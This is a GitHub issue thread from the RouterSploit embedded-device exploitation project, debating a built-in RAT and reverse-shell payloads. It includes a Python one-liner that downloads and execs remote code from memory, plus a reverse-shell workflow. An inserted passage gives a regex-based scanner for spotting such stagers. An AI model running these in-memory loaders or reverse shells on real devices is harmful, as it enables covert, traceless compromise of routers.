threat9 / routersploit

Exploitation Framework for Embedded Devices

RouterSploit should have a build-in RAT, similar to meterpreter. #24

Open nymx opened 8 years ago

nymx commented 8 years ago

I'm not sure if this counts as an issue, really, but I feel that this framework could be greatly improved by the addition of a RAT, similar to meterpreter, but written in python, perhaps.

MatthewHKnight commented 8 years ago

Eh, hate the word RAT; however, a backdoor or shell would be interesting. I've heard there is a way to drop a busybox-like thing on some routers.

nymx commented 8 years ago

I've been writing such a tool recently in python, and I'd be happy to contribute something similar to this project.

lucyoa commented 8 years ago

Sure @Bouncingbunny, we would love to see your contribution to the project.

In the case of a RAT, what exactly do you have in mind? We are working on "reverse shells" functionality which is going to work as follows:

  1. Server that hosts reverse shell binary is set up
  2. Action responsible for transferring binary to the device is issued (for example command injection)
  3. Binary is executed on the device and reverse shell connects directly to the attacker

There are numerous ways of transferring a binary to the device, and it depends on the specific device and available tools:

nymx commented 8 years ago

@lucyoa I was thinking that it could execute some Python with RCE (I believe that most/all routers would have a Python interpreter). Said Python one-liner downloads and executes a larger Python module from memory. This larger module could do port scanning, open backdoors, open a VPN/SSH tunnel, etc.

Also, you wouldn't have to compile a binary for each architecture if you wrote it in python.

lucyoa commented 8 years ago

@Bouncingbunny Not all routers have Python installed. I think your module is quite interesting and it could be something like an extension to the basic cmd shell. The user could run this manually when Python is present, e.g. "run rat", and the command would invoke your RAT that provides advanced post-exploitation functions.

JPaulMora commented 8 years ago

Something to note, which I have had issues with before (especially with embedded devices), is that the OS is usually mounted (if not made) read-only. Besides this limitation, I do think a Router-RAT could be useful to make, in which case I would not limit myself to a single language for scripting, since different routers have different capabilities.

I would suggest making a common command syntax for the RRAT and then coding it in multiple languages or even router-specific versions. That way we could let the script manage the tasks/limitations without giving much trouble to the user.

nymx commented 8 years ago

@jpaulmora If the file system is read-only, then a memory-only RAT would be best.

JPaulMora commented 8 years ago

@Bouncingbunny Exactly!

lucyoa commented 8 years ago

Currently for RCE exploits we have a custom-made command loop:

    def command_loop(self):
        # Read commands until the user quits; each one is run on the target via self.execute()
        while True:
            cmd = input("cmd > ")

            if cmd in ['exit', 'quit']:
                return

            print(self.execute(cmd))

I think you can try to change it to something like that:

    def command_loop(self):
        while True:
            cmd = input("cmd > ")

            if cmd == "run rat":
                # Hand off to the imported RAT module instead of sending the text as a shell command
                self.execute(your_module_rat.payload)
                continue

            if cmd in ['exit', 'quit']:
                return

            print(self.execute(cmd))

And your imported RAT module would do all the magic.

nymx commented 8 years ago

@lucyoa While that would work, I feel like it would seem like a "hacky" solution. I think that an RCE handler should be added to the core, and if the target has Python, it will drop into a handler for the RAT. Otherwise it would drop into a cmd shell.

lucyoa commented 8 years ago

@Bouncingbunny Yes, you are right, but for now we need to increase the identification and exploitation capabilities of the framework to cover more devices. This little hack lets you work on a RAT that can be tested by users, and when the time comes for post-exploitation functions we will add this to the core.

nymx commented 8 years ago

@lucyoa Very well. While you guys work on router exploitation, I'll start development on post-exploitation. I'm not an amazing programmer, so it might take a bit, though. I also need to think of a name for it, so if any of you have any ideas, please share.

n1nj4sec commented 8 years ago

are you looking for pupy ? ;)

nymx commented 8 years ago

@n1nj4sec pupy is so cool, but can it be deployed on a target without downloading it onto that target?

jayzeng commented 8 years ago

Or https://github.com/jonathanslenders/python-prompt-toolkit ?

n1nj4sec commented 8 years ago

Yes, I think it can be run entirely from memory on Linux with very little work. I already planned on doing a Python one-liner loader.

nymx commented 8 years ago

@n1nj4sec Awesome! Please do that! Don't a significant number of pupy's features require the part written in C, though? How do you plan on loading an executable from memory with Python?

n1nj4sec commented 8 years ago

Done! Here is a PoC: https://github.com/n1nj4sec/pupy/blob/dev/pupy/oneliner_poc.py All it needs to execute pupy from memory (including the required libraries like rpyc) is:

    python -c 'import urllib;exec urllib.urlopen("http://127.0.0.1:8080/oneliner.py").read()'

No trace on the disk. It is chained with an SSH remote port forwarding (-R 8080:127.0.0.1:8080) in my case.
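Because a loader like the one above leaves nothing on disk, the process command line (and the outbound HTTP fetch) is the main artefact a defender has. The following is an added detection example, not code from this thread or from pupy/routersploit: it flags inline-Python stagers that fetch and exec remote code in constructed process-start events (field names and sample values are assumptions).

```python
import re

# Interpreter invoked with inline code: "python -c", "python3 -c", "python2.7 -c" ...
_INLINE_PY = re.compile(r"\bpython(?:[23](?:\.\d+)?)?\s+-c\b")
# Remote-fetch primitives: the urllib call from the thread plus common equivalents
_FETCH = re.compile(r"urlopen|urlretrieve|requests\.get|socket\.create_connection")
# Dynamic execution of whatever was fetched
_EXEC = re.compile(r"\bexec\b|\beval\b|compile\(")


def is_inmemory_loader(cmdline):
    """True if a command line looks like an in-memory Python stager:
    inline code (-c) that fetches something remote and exec()s it."""
    return bool(_INLINE_PY.search(cmdline)
                and _FETCH.search(cmdline)
                and _EXEC.search(cmdline))


def scan_process_events(events):
    """Return the events (dicts with "pid" and "cmdline") that match the stager pattern."""
    return [e for e in events if is_inmemory_loader(e["cmdline"])]


# Constructed sample process-start events (assumed telemetry shape, not real data)
SAMPLE_EVENTS = [
    {"pid": 101, "cmdline": "python -c 'import urllib;exec urllib.urlopen(\"http://127.0.0.1:8080/oneliner.py\").read()'"},
    {"pid": 102, "cmdline": "python3 -c 'import urllib.request as u;exec(u.urlopen(\"http://10.0.0.5/x.py\").read())'"},
    {"pid": 103, "cmdline": "python3 -c 'print(1+1)'"},
    {"pid": 104, "cmdline": "python3 /usr/bin/dnsmasq-helper.py --reload"},
    {"pid": 105, "cmdline": "curl http://example.invalid/firmware.bin -o /tmp/fw.bin"},
]

if __name__ == "__main__":
    for e in scan_process_events(SAMPLE_EVENTS):
        print("suspicious in-memory python loader: pid=%d cmdline=%s" % (e["pid"], e["cmdline"]))
```

Most routers have no process telemetry at all, so in practice this check is more useful on hosts that can reach the device, or as a rule over egress proxy logs for the fetch itself.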

n1nj4sec commented 8 years ago

@Bouncingbunny The part written in C is only necessary for loading .pyd or .so libraries from memory. pupy doesn't need that part if you don't use the process migration features, but all other features are still available as long as they only require pure Python packages (.py, .pyc) that can easily be loaded from memory.

awnumar commented 8 years ago

A properly implemented reverse shell that doesn't die with interactive programs, cd, infinite loops, and errors would be good enough. There's really no need for any more functionality. It's a router mate. Why do you need a RAT?

maxzinkus commented 8 years ago

For RCE exploits, there should probably be pluggable payloads, one of which can be the currently implemented shell loop. This would be ideal for networks with IDS/IPS when shell commands over the wire will throw red flags everywhere.

Also, this opens the way for future payload development, and perhaps the inclusion of a payload encoder, and then somewhere down the road a pluggable encoder option.

HOWEVER it really depends on how much you want this project to morph into being only a subset of metasploit. There are pros and cons to going down that path.

JPaulMora commented 8 years ago

I agree, but based on the interface and all, I believe this is a router-targeted version of metasploit with the advantage of being Python based (Have you tried installing metasploit? It's a complete headache no matter the platform: ruby version, rebuild, it breaks again, aaaaah!).

Whether this will evolve to a multipurpose exploit kit like metasploit, well, that's for the contributors and cloners to decide.

bcook-r7 commented 8 years ago

We are working on a new native cross-platform meterpreter-like payload here: https://github.com/rapid7/mettle and have in-memory and stageless versions for a few different architectures. The design is such that its resident footprint is small (< 1MB), and the event loop should be able to support more than the synchronous meterpreter TLV protocol as well.

As this project gets larger and larger (hope it does!), hoping we can make it work with both Metasploit and Routersploit.

lucyoa commented 8 years ago

@bcook-r7 It looks nice. Gonna check it out. Thanks!

timwr commented 7 years ago

@lucyoa :)

busterb commented 7 years ago

By the way, we have now integrated this as the standard native Linux meterpreter in Metasploit; it supports staged, stageless, reverse tcp/http/s. I'd be happy to discuss how to make it useful to your project as well, since it's fairly project-agnostic code.

lucyoa commented 7 years ago

Hey @busterb, thanks for that! We are definitely interested in adding Mettle to the Routersploit project. I will try to play with it and figure out how it can be incorporated into the existing framework.

TormentedSoul666 commented 3 years ago

A proper CLI/API would be much more beneficial. I really enjoy the nowadays approach to build pen testing tools in a modular way, and since the rise of Python, imagine the possibilities of implementing those kinda standardized frameworks as modules in other projects.